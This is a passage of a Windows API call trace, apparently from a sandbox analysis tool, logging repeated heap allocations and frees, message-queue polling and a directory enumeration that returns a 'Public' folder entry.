Size=0x20) returned 0x31ef9c8 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef810 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef518 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef888 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef130 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef9f0 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef4c8 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef1a8 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef4f0 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef3b0 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef478 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31eee88 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef720 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efc70 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efa18 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175b40 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f78 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0092.999] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0092.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef8d8 | out: hHeap=0x680000) returned 1 [0092.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef1d0 | out: hHeap=0x680000) returned 1 [0092.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef78 | out: hHeap=0x680000) returned 1 [0092.999] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efba8 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efab8 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef388 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef040 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa68 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efbd0 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efb58 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef5e0 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eefa0 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef838 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef6a8 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eee10 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efb80 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef748 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef068 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef658 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef248 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efa90 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7c0 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31eef00 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef338 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175fc0 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e28 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f08 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31beb38 | out: hHeap=0x680000) returned 1 [0093.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3f40 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e98 | out: hHeap=0x680000) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3ed0 | out: hHeap=0x680000) returned 1 [0093.000] FindNextFileW (in: hFindFile=0x6bdca8, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdac04c8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x917fa2ee, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Public", cAlternateFileName="")) returned 0 [0093.000] FindClose (in: hFindFile=0x6bdca8 | out: hFindFile=0x6bdca8) returned 1 [0093.000] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efae0 | out: hHeap=0x680000) returned 1 [0093.000] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.000] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31efae0 [0093.000] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef338 [0093.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef338 | out: hHeap=0x680000) returned 1 [0093.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef338 [0093.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef338 | out: hHeap=0x680000) returned 1 [0093.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef338 [0093.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef338 | out: hHeap=0x680000) returned 1 [0093.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef338 [0093.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef338 | out: hHeap=0x680000) returned 1 [0093.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef338 [0093.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef338 | out: hHeap=0x680000) returned 1 [0093.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef338 [0093.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef338 | out: hHeap=0x680000) returned 1 [0093.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef338 [0093.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef338 | out: hHeap=0x680000) returned 1 [0093.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef338 [0093.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef338 | out: hHeap=0x680000) returned 1 [0093.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef338 [0093.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.001] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef338 | out: hHeap=0x680000) returned 1 [0093.001] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef338 [0093.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef338 | out: hHeap=0x680000) returned 1 [0093.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef338 [0093.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef338 | out: hHeap=0x680000) returned 1 [0093.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef338 [0093.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef338 | out: hHeap=0x680000) returned 1 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efae0 | out: hHeap=0x680000) returned 1 [0093.002] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3e60 | out: hHeap=0x680000) returned 1 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2e8 | out: hHeap=0x680000) returned 1 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efce8 | out: hHeap=0x680000) returned 1 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3175990 | out: hHeap=0x680000) returned 1 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efb30 | out: hHeap=0x680000) returned 1 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef310 | out: hHeap=0x680000) returned 1 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3df0 | out: hHeap=0x680000) returned 1 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3d48 | out: hHeap=0x680000) returned 1 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31efc20 | out: hHeap=0x680000) returned 1 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef7e8 | out: hHeap=0x680000) returned 1 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31758b8 | out: hHeap=0x680000) returned 1 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef590 | out: hHeap=0x680000) returned 1 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef540 | out: hHeap=0x680000) returned 1 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3165e90 | out: hHeap=0x680000) returned 1 [0093.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef540 [0093.002] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0093.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.002] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.002] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.003] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.003] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x840) returned 0x99ca4f0 [0093.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.004] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.004] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x830) returned 0x99ca4f0 [0093.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc46) returned 0x99f05a0 [0093.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x820) returned 0x99ca4f0 [0093.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc2e) returned 0x99f05a0 [0093.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ca4f0 | out: hHeap=0x680000) returned 1 [0093.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f05a0 | out: hHeap=0x680000) returned 1 [0093.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef2c0 | out: hHeap=0x680000) returned 1 [0093.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef2c0 [0093.005] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x860) returned 0x31cf750 [0093.005] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.005] HeapFree (in: hHeap=0x680000, 